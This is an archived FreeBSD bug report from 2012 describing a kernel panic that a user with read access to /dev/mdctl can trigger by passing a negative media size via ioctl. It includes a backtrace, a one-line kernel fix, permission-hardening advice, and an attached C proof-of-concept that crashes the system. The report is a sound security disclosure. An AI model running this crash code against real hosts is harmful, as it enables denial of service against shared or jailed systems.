From owner-freebsd-bugs@FreeBSD.ORG Tue Jul 17 18:00:23 2012 Return-Path: Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 28203106566B for ; Tue, 17 Jul 2012 18:00:23 +0000 (UTC) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (freefall.freebsd.org [IPv6:2001:4f8:fff6::28]) by mx1.freebsd.org (Postfix) with ESMTP id 003138FC0C for ; Tue, 17 Jul 2012 18:00:22 +0000 (UTC) Received: from freefall.freebsd.org (localhost [127.0.0.1]) by freefall.freebsd.org (8.14.5/8.14.5) with ESMTP id q6HI0M0H064834 for ; Tue, 17 Jul 2012 18:00:22 GMT (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.14.5/8.14.5/Submit) id q6HI0Mws064833; Tue, 17 Jul 2012 18:00:22 GMT (envelope-from gnats) Resent-Date: Tue, 17 Jul 2012 18:00:22 GMT Resent-Message-Id: <201207171800.q6HI0Mws064833@freefall.freebsd.org> Resent-From: FreeBSD-gnats-submit@FreeBSD.org (GNATS Filer) Resent-To: freebsd-bugs@FreeBSD.org Resent-Reply-To: FreeBSD-gnats-submit@FreeBSD.org, Filip Palian Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 214D21065672 for ; Tue, 17 Jul 2012 17:50:26 +0000 (UTC) (envelope-from nobody@FreeBSD.org) Received: from red.freebsd.org (red.freebsd.org [IPv6:2001:4f8:fff6::22]) by mx1.freebsd.org (Postfix) with ESMTP id 0C6B58FC17 for ; Tue, 17 Jul 2012 17:50:26 +0000 (UTC) Received: from red.freebsd.org (localhost [127.0.0.1]) by red.freebsd.org (8.14.4/8.14.4) with ESMTP id q6HHoP5A098958 for ; Tue, 17 Jul 2012 17:50:25 GMT (envelope-from nobody@red.freebsd.org) Received: (from nobody@localhost) by red.freebsd.org (8.14.4/8.14.4/Submit) id q6HHoPQ2098957; Tue, 17 Jul 2012 17:50:25 GMT (envelope-from nobody) Message-Id: <201207171750.q6HHoPQ2098957@red.freebsd.org> Date: Tue, 17 Jul 2012 17:50:25 GMT From: Filip Palian To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-3.1 Cc: Subject: misc/169947: System crash via ioctl() on mdctl. X-BeenThere: freebsd-bugs@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: Bug reports List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 17 Jul 2012 18:00:23 -0000 >Number: 169947 >Category: misc >Synopsis: System crash via ioctl() on mdctl. >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Tue Jul 17 18:00:22 UTC 2012 >Closed-Date: >Last-Modified: >Originator: Filip Palian >Release: FreeBSD 9.0-RELEASE #0 >Organization: >Environment: FreeBSD fbsd 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:14:25 UTC 2012 root at obrian.cse.buffalo.edu:/usr/obj/usr/src/sys/GENEREIC i386 >Description: User who has read permission on "/dev/mdctl" is able to crash the system (also within the jail if only provided by devfs(.rules)) via ioctl() handler in "/usr/src/sys/dev/md/md.c:1082". The crash occures in function swap_release_by_cred() (swap_pager.c:285) called in vm_object_deallocate() (md.c:1119). Some detailed information included below. -- cut -- fbsd dumped core - see /var/crash/vmcore.0 . panic: swap_reserved < decr . Unread portion of the kernel message buffer: panic: swap_reserved < decr cpuid = 0 KDB: stack backtrace: #0 0xc0a4b1d7 at kdb_backtrace+0x47 #1 0xc0a18737 at panic+0x117 #2 0xc0c6d147 at swap_release_by_cred+0x97 <--- paniced here #3 0xc0c85684 at vm_object_destroy+0xd4 #4 0xc0c87825 at vm_object_terminate+0x2c5 #5 0xc0c880a7 at vm_object_deallocate+0x877 #6 0xc0c7da51 at vm_map_entry_deallocate+0x21 #7 0xc0c7daba at vm_map_process_deferred+0x2a #8 0xc0c7ebfa at _vm_map_unlock+0x4a #9 0xc0c7f2eb at vm_map_remove+0x6b #10 0xc0c82543 at vmspace_exit+0xc3 #11 0xc09e9038 at exit1+0x6f8 #12 0xc09e9d7d at sys_sys_exit+0x1d #13 0xc0d4c275 at syscall+0x355 #14 0xc0d35a51 at Xint0x80_syscall+0x21 Uptime: 2h36m43s Physical memory: 1383 MB Dumping 80 MB: 65 49 33 17 1 -- cut -- >How-To-Repeat: Compile and execute the code from the attachment. >Fix: The "mediasize" member of the "md_s" structure should be of unsigned type. Currently it's of type off_t, which is "typedef long __int64_t". Alternative solution would be to add the following sanity condition in md.c:1091 (not mentioning the author's comment): -- cut -- --- dev/md/md.c.old 2012-07-15 21:32:40.000000000 +0200 +++ dev/md/md.c 2012-07-15 21:30:00.000000000 +0200 @@ -1088,7 +1088,7 @@ mdcreate_swap(struct md_s *sc, struct md * Range check. Disallow negative sizes or any size less then the * size of a page. Then round to a page. */ - if (sc->mediasize == 0 || (sc->mediasize % PAGE_SIZE) != 0) + if (sc->mediasize <= 0 || (sc->mediasize % PAGE_SIZE) != 0) return (EDOM); /* -- cut -- To prevent evil users from doing bad things administrators should ensure, that "/dev/mdctl" permissions are +rw (600) only for root. For servers where jails are provided for untrusted users (e.g. hosting companies) access to "/dev/mdctl" device should be forbidden/hidden using defvs.rules. Patch attached with submission follows: #include #include #include #include #include #include #include #include #include #include #include int main() { int f; void *p; struct md_ioctl s; struct stat ss; s.md_version = MDIOVERSION; // s.md_type = MD_SWAP; s.md_type = MD_PRELOAD; s.md_options = MD_CLUSTER | MD_AUTOUNIT | MD_COMPRESS; // typedef long long = int64 = off_t //s.md_mediasize = 4096*1000000000000000000000000000000000000000000000000000; s.md_mediasize = -1000000000000; if (stat("/dev/mdctl", &ss) != 0) { printf("stat(\"/dev/mdctl\") failed: %s\n", strerror(errno)); exit (0); } f = open("/dev/mdctl", O_RDONLY, 0); printf("say goodnight...\n"); if (ioctl(f, MDIOCATTACH, &s) < 0) printf("ioctl(MDIOCATTACH) failed: %s\n", strerror(errno)); printf("no +r no fun\n"); exit (0); } >Release-Note: >Audit-Trail: >Unformatted: